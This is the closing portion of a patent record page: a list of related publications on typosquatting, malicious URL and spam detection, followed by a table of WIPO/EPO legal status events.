Banerjee et al. SUT: Quantifying and mitigating url typosquatting
US20190222609A1 (en) Method and computer device for identifying malicious web resources
RU2693325C2 (en) Method and system for detecting actions potentially associated with spamming in account registration
McKenna Detection and classification of Web robots with honeypots
WO2007076714A1 (en) System and method for generalizing an antispam blacklist
Tao Suspicious URL and device detection by log mining

Legal Events

Date Code Title Description
121 Ep: the epo has been informed by wipo that ep was designated in this application
NENP Non-entry into the national phase

Ref country code: DE

122 Ep: pct application non-entry in european phase

Ref document number: 06840757

Country of ref document: EP

Kind code of ref document: A1